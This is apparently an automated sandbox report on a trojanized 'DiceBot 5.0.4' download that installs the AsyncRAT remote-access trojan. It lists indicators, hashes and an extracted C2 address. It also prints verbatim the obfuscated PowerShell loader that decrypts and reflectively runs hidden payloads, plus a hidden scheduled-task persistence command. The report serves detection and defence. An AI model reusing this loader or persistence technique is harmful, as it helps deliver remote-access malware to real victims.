Overview
overview
10Static
static
3DiceBot 5.....4.exe
windows7-x64
1DiceBot 5.....4.exe
windows10-2004-x64
10DiceBot 5....ox.dll
windows7-x64
1DiceBot 5....ox.dll
windows10-2004-x64
1DiceBot 5....nt.dll
windows7-x64
1DiceBot 5....nt.dll
windows10-2004-x64
1DiceBot 5....on.dll
windows7-x64
1DiceBot 5....on.dll
windows10-2004-x64
1DiceBot 5....PI.dll
windows7-x64
1DiceBot 5....PI.dll
windows10-2004-x64
1DiceBot 5....nt.dll
windows7-x64
1DiceBot 5....nt.dll
windows10-2004-x64
1DiceBot 5....in.dll
windows7-x64
1DiceBot 5....in.dll
windows10-2004-x64
1DiceBot 5....on.dll
windows7-x64
1DiceBot 5....on.dll
windows10-2004-x64
1DiceBot 5....pt.dll
windows7-x64
3DiceBot 5....pt.dll
windows10-2004-x64
3DiceBot 5....ua.dll
windows7-x64
1DiceBot 5....ua.dll
windows10-2004-x64
1DiceBot 5....ne.dll
windows7-x64
1DiceBot 5....ne.dll
windows10-2004-x64
1DiceBot 5....rs.dll
windows7-x64
1DiceBot 5....rs.dll
windows10-2004-x64
1DiceBot 5....te.dll
windows7-x64
1DiceBot 5....te.dll
windows10-2004-x64
1DiceBot 5....on.dll
windows7-x64
1DiceBot 5....on.dll
windows10-2004-x64
1DiceBot 5....or.dll
windows7-x64
1DiceBot 5....or.dll
windows10-2004-x64
1DiceBot 5....et.dll
windows7-x64
1DiceBot 5....et.dll
windows10-2004-x64
1Analysis
-
max time kernel
144s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-01-2025 21:06
Static task
static1
Behavioral task
behavioral1
Sample
DiceBot 5.0.4/DiceBot 5.0.4.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
DiceBot 5.0.4/DiceBot 5.0.4.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
DiceBot 5.0.4/FastColoredTextBox.dll
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
DiceBot 5.0.4/FastColoredTextBox.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
DiceBot 5.0.4/GraphQL.Client.dll
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
DiceBot 5.0.4/GraphQL.Client.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
DiceBot 5.0.4/GraphQL.Common.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
DiceBot 5.0.4/GraphQL.Common.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
DiceBot 5.0.4/JDCAPI.dll
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
DiceBot 5.0.4/JDCAPI.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
DiceBot 5.0.4/Microsoft.AspNet.SignalR.Client.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
DiceBot 5.0.4/Microsoft.AspNet.SignalR.Client.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
DiceBot 5.0.4/NBitcoin.dll
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
DiceBot 5.0.4/NBitcoin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
DiceBot 5.0.4/Newtonsoft.Json.dll
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
DiceBot 5.0.4/Newtonsoft.Json.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
DiceBot 5.0.4/Noesis.Javascript.dll
Resource
win7-20241010-en
Behavioral task
behavioral18
Sample
DiceBot 5.0.4/Noesis.Javascript.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
DiceBot 5.0.4/SharpLua.dll
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
DiceBot 5.0.4/SharpLua.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
DiceBot 5.0.4/SuperSocket.ClientEngine.dll
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
DiceBot 5.0.4/SuperSocket.ClientEngine.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
DiceBot 5.0.4/System.Buffers.dll
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
DiceBot 5.0.4/System.Buffers.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
DiceBot 5.0.4/System.Data.SQLite.dll
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
DiceBot 5.0.4/System.Data.SQLite.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
DiceBot 5.0.4/System.Runtime.InteropServices.RuntimeInformation.dll
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
DiceBot 5.0.4/System.Runtime.InteropServices.RuntimeInformation.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
DiceBot 5.0.4/TwoStepsAuthenticator.dll
Resource
win7-20240708-en
Behavioral task
behavioral30
Sample
DiceBot 5.0.4/TwoStepsAuthenticator.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
DiceBot 5.0.4/WebSocket4Net.dll
Resource
win7-20241023-en
Behavioral task
behavioral32
Sample
DiceBot 5.0.4/WebSocket4Net.dll
Resource
win10v2004-20241007-en
General
-
Target
DiceBot 5.0.4/DiceBot 5.0.4.exe
-
Size
178KB
-
MD5
109ffbefe8cccafc6db7276baa45be0f
-
SHA1
df7300d951756013db8b820ce4b4044559fe83d1
-
SHA256
647de53b1d9e75ec2ff48838924ddd00799d05c0d61af111a842a59621a90f7c
-
SHA512
13af9f6925cb22bb2b4c644e6737d37e508c1a53677942619c415265e4a9b699769df7406d6409dad5198c428bf66c54cf33490a2b98450546b73a68422793d5
-
SSDEEP
768:mj+HObZiwMBp7jlP9LWJz9AktYcF2l1x6KOFn60KS:m9bZi7B0QY21xlOFn60KS
Malware Config
Extracted
asyncrat
AsyncRAT
Stake
powershellcmd.theworkpc.com:111
AsyncMutex_bloxstrap
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/3512-89-0x00000000072E0000-0x00000000072F6000-memory.dmp family_asyncrat -
Blocklisted process makes network request 6 IoCs
flow pid Process 15 3512 powershell.exe 34 3512 powershell.exe 38 3512 powershell.exe 45 3512 powershell.exe 46 3512 powershell.exe 48 3512 powershell.exe -
pid Process 3488 powershell.exe 3512 powershell.exe 824 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation DiceBot 5.0.4.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2292 3320 WerFault.exe 87 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language render.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings DiceBot 5.0.4.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1096 DiceBot 5.0.4.exe 3488 powershell.exe 3488 powershell.exe 824 powershell.exe 824 powershell.exe 3512 powershell.exe 3512 powershell.exe 3512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1096 DiceBot 5.0.4.exe Token: SeDebugPrivilege 3488 powershell.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeIncreaseQuotaPrivilege 824 powershell.exe Token: SeSecurityPrivilege 824 powershell.exe Token: SeTakeOwnershipPrivilege 824 powershell.exe Token: SeLoadDriverPrivilege 824 powershell.exe Token: SeSystemProfilePrivilege 824 powershell.exe Token: SeSystemtimePrivilege 824 powershell.exe Token: SeProfSingleProcessPrivilege 824 powershell.exe Token: SeIncBasePriorityPrivilege 824 powershell.exe Token: SeCreatePagefilePrivilege 824 powershell.exe Token: SeBackupPrivilege 824 powershell.exe Token: SeRestorePrivilege 824 powershell.exe Token: SeShutdownPrivilege 824 powershell.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeSystemEnvironmentPrivilege 824 powershell.exe Token: SeRemoteShutdownPrivilege 824 powershell.exe Token: SeUndockPrivilege 824 powershell.exe Token: SeManageVolumePrivilege 824 powershell.exe Token: 33 824 powershell.exe Token: 34 824 powershell.exe Token: 35 824 powershell.exe Token: 36 824 powershell.exe Token: SeIncreaseQuotaPrivilege 824 powershell.exe Token: SeSecurityPrivilege 824 powershell.exe Token: SeTakeOwnershipPrivilege 824 powershell.exe Token: SeLoadDriverPrivilege 824 powershell.exe Token: SeSystemProfilePrivilege 824 powershell.exe Token: SeSystemtimePrivilege 824 powershell.exe Token: SeProfSingleProcessPrivilege 824 powershell.exe Token: SeIncBasePriorityPrivilege 824 powershell.exe Token: SeCreatePagefilePrivilege 824 powershell.exe Token: SeBackupPrivilege 824 powershell.exe Token: SeRestorePrivilege 824 powershell.exe Token: SeShutdownPrivilege 824 powershell.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeSystemEnvironmentPrivilege 824 powershell.exe Token: SeRemoteShutdownPrivilege 824 powershell.exe Token: SeUndockPrivilege 824 powershell.exe Token: SeManageVolumePrivilege 824 powershell.exe Token: 33 824 powershell.exe Token: 34 824 powershell.exe Token: 35 824 powershell.exe Token: 36 824 powershell.exe Token: SeIncreaseQuotaPrivilege 824 powershell.exe Token: SeSecurityPrivilege 824 powershell.exe Token: SeTakeOwnershipPrivilege 824 powershell.exe Token: SeLoadDriverPrivilege 824 powershell.exe Token: SeSystemProfilePrivilege 824 powershell.exe Token: SeSystemtimePrivilege 824 powershell.exe Token: SeProfSingleProcessPrivilege 824 powershell.exe Token: SeIncBasePriorityPrivilege 824 powershell.exe Token: SeCreatePagefilePrivilege 824 powershell.exe Token: SeBackupPrivilege 824 powershell.exe Token: SeRestorePrivilege 824 powershell.exe Token: SeShutdownPrivilege 824 powershell.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeSystemEnvironmentPrivilege 824 powershell.exe Token: SeRemoteShutdownPrivilege 824 powershell.exe Token: SeUndockPrivilege 824 powershell.exe Token: SeManageVolumePrivilege 824 powershell.exe Token: 33 824 powershell.exe Token: 34 824 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3512 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 1096 wrote to memory of 3228 1096 DiceBot 5.0.4.exe 85 PID 1096 wrote to memory of 3228 1096 DiceBot 5.0.4.exe 85 PID 1096 wrote to memory of 3320 1096 DiceBot 5.0.4.exe 87 PID 1096 wrote to memory of 3320 1096 DiceBot 5.0.4.exe 87 PID 1096 wrote to memory of 3320 1096 DiceBot 5.0.4.exe 87 PID 3228 wrote to memory of 2184 3228 cmd.exe 88 PID 3228 wrote to memory of 2184 3228 cmd.exe 88 PID 3228 wrote to memory of 3488 3228 cmd.exe 89 PID 3228 wrote to memory of 3488 3228 cmd.exe 89 PID 3228 wrote to memory of 3488 3228 cmd.exe 89 PID 3488 wrote to memory of 824 3488 powershell.exe 93 PID 3488 wrote to memory of 824 3488 powershell.exe 93 PID 3488 wrote to memory of 824 3488 powershell.exe 93 PID 3488 wrote to memory of 1908 3488 powershell.exe 96 PID 3488 wrote to memory of 1908 3488 powershell.exe 96 PID 3488 wrote to memory of 1908 3488 powershell.exe 96 PID 1908 wrote to memory of 228 1908 WScript.exe 97 PID 1908 wrote to memory of 228 1908 WScript.exe 97 PID 1908 wrote to memory of 228 1908 WScript.exe 97 PID 228 wrote to memory of 3368 228 cmd.exe 99 PID 228 wrote to memory of 3368 228 cmd.exe 99 PID 228 wrote to memory of 3368 228 cmd.exe 99 PID 228 wrote to memory of 3512 228 cmd.exe 100 PID 228 wrote to memory of 3512 228 cmd.exe 100 PID 228 wrote to memory of 3512 228 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\DiceBot 5.0.4.exe"C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\DiceBot 5.0.4.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\data\driver.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9a3dmqA7Z/DHdYvQvXDxJB6f7txQiyBVadbPgdWDko0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vXseLiQG8ejGzth94Cz/bQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DAOFT=New-Object System.IO.MemoryStream(,$param_var); $BxAQM=New-Object System.IO.MemoryStream; $tsDqC=New-Object System.IO.Compression.GZipStream($DAOFT, [IO.Compression.CompressionMode]::Decompress); $tsDqC.CopyTo($BxAQM); $tsDqC.Dispose(); $DAOFT.Dispose(); $BxAQM.Dispose(); $BxAQM.ToArray();}function execute_function($param_var,$param2_var){ $pDhYm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uKlGi=$pDhYm.EntryPoint; $uKlGi.Invoke($null, $param2_var);}$jqCUp = 'C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\data\driver.bat';$host.UI.RawUI.WindowTitle = $jqCUp;$GNhJC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jqCUp).Split([Environment]::NewLine);foreach ($JyGcd in $GNhJC) { if ($JyGcd.StartsWith('KUxGjdLQAzrzMfSYqNGS')) { $mXPBz=$JyGcd.Substring(20); break; }}$payloads_var=[string[]]$mXPBz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2184
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_516_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_516.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_516.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_516.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9a3dmqA7Z/DHdYvQvXDxJB6f7txQiyBVadbPgdWDko0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vXseLiQG8ejGzth94Cz/bQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DAOFT=New-Object System.IO.MemoryStream(,$param_var); $BxAQM=New-Object System.IO.MemoryStream; $tsDqC=New-Object System.IO.Compression.GZipStream($DAOFT, [IO.Compression.CompressionMode]::Decompress); $tsDqC.CopyTo($BxAQM); $tsDqC.Dispose(); $DAOFT.Dispose(); $BxAQM.Dispose(); $BxAQM.ToArray();}function execute_function($param_var,$param2_var){ $pDhYm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uKlGi=$pDhYm.EntryPoint; $uKlGi.Invoke($null, $param2_var);}$jqCUp = 'C:\Users\Admin\AppData\Roaming\Windows_Log_516.bat';$host.UI.RawUI.WindowTitle = $jqCUp;$GNhJC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jqCUp).Split([Environment]::NewLine);foreach ($JyGcd in $GNhJC) { if ($JyGcd.StartsWith('KUxGjdLQAzrzMfSYqNGS')) { $mXPBz=$JyGcd.Substring(20); break; }}$payloads_var=[string[]]$mXPBz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
- System Location Discovery: System Language Discovery
PID:3368
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3512
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\data\render.exe"C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\data\render.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3320 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 8883⤵
- Program crash
PID:2292
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3320 -ip 33201⤵PID:1412
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD555d32bc1c206428fe659912b361362de
SHA17056271e5cf73b03bafc4e616a0bc5a4cffc810f
SHA25637bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff
SHA5122602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c
-
Filesize
20KB
MD51e52f697b7003cd1c6875fe012a220bb
SHA1d06ab8dbf87158ee8182dca491e4b320961dba95
SHA256cd00b08b6b35dd97567c0d70351ad99e06c910b8712e3735171a2f580f53b4a2
SHA512045828221c963deb0b7c7a34a1c5e9835707bac487abb31cf9a9a99e74329c17ab4ff6e9d0d11d0b508353aea4840e89e361a19c39b60b82d6cd5fd46de9a933
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
54KB
MD517f33919a97f2aef8e0c3319220c5c7e
SHA171d81cd98b31275cd626ff2b219b8ab5149e30ce
SHA256afb0d669166beac060fe834d4d0c593b50b1700e913f81fa8df6533be14c9cbf
SHA5128cc5ed6d9eea9f4f380edecba3265194d6cbf9ad7162c8166f5aea3dee964b5dbf0959f1b5d3bb87222d155428e850c01346af366c8eb07b57ec3975dcf62a5b
-
Filesize
115B
MD584110ff817798c70438db1a745a75776
SHA130a53f41db5fbf00f1969bf912f6174d78352c7d
SHA2564cdfa3769b34bfe038edd82823b27f69c4bb62f325e1e6dd18e7c5d5fdfd0a86
SHA512a15875b286b04c828eae80e9bcbbf4fdb025d7a6c14a8919f44d5e0e994be2c1996dd1ae8a87f21e81aa4c4a2b610bcfbfa56c1f2c85e921b1cdabd2ae2f3621